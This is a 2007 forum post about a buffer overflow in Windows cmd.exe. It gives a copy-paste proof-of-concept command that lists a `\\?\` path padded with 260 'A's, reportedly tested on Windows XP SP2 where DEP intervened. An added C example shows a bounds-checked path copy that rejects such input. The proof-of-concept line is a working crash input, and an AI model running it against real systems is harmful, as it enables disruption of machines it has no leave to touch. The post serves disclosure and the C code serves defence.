Windows Command Processor CMD.EXE Buffer Overflow

Started by insanity, 01 January 2007, 08:20:30 PM

insanity

Author: Gregory R. Panakka
Execute the following line in cmd.exe (copy-paste).
Tested on WinXP SP2 (fully patched) on 2006/10/06/17.56

%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"


(260 characters of 'A's)

Well, DEP (Data Execution Protection) comes into the picture and saves the day (???).

Haven't tried in Windows 2000 or Windows XP SP1 (or rather any other operating system).

Here are some screenshots....
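
An added example, not part of the original post or advisory: a bounds-checked path copy in C, run against constructed input of the same shape as the line above (`\\?\` followed by 260 'A's). It assumes the general bug class of a path copied into a fixed 260-byte (MAX_PATH-sized) buffer; the post does not state cmd.exe's actual root cause, and `PATH_BUF_LEN`, `copy_path_checked`, `has_extended_prefix` and `build_sample` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Same value as Win32 MAX_PATH: 260 bytes including the terminating NUL. */
#define PATH_BUF_LEN 260

enum path_status { PATH_OK = 0, PATH_TOO_LONG = 1, PATH_BAD_ARG = 2 };

/* The \\?\ prefix asks Win32 for extended-length handling, so such a
 * path is not limited to MAX_PATH and must never be assumed to fit. */
static int has_extended_prefix(const char *path)
{
    return strncmp(path, "\\\\?\\", 4) == 0;
}

/* Copy src into a fixed buffer; refuse (no truncation, no overflow)
 * when src plus its NUL does not fit in dst_size bytes. */
static enum path_status copy_path_checked(char *dst, size_t dst_size,
                                          const char *src)
{
    const char *end;
    if (dst == NULL || src == NULL || dst_size == 0)
        return PATH_BAD_ARG;
    end = memchr(src, '\0', dst_size);   /* look no further than dst_size */
    if (end == NULL) {                   /* no NUL in range: too long */
        dst[0] = '\0';
        return PATH_TOO_LONG;
    }
    memcpy(dst, src, (size_t)(end - src) + 1);
    return PATH_OK;
}

/* Constructed sample input: \\?\ followed by n_fill 'A' characters. */
static size_t build_sample(char *out, size_t out_size, size_t n_fill)
{
    size_t total = 4 + n_fill;
    if (out_size < total + 1) return 0;
    memcpy(out, "\\\\?\\", 4);
    memset(out + 4, 'A', n_fill);
    out[total] = '\0';
    return total;
}

int main(void)
{
    char in[512], out[PATH_BUF_LEN];
    size_t n = build_sample(in, sizeof in, 260);   /* 4 + 260 = 264 chars */
    printf("len=%zu extended=%d status=%d\n", n, has_extended_prefix(in),
           (int)copy_path_checked(out, sizeof out, in));
    return 0;
}
```

With the prefix counted, the 260-character payload is a 264-character path, so it cannot fit a 260-byte buffer; the checked copy rejects it instead of writing past the end.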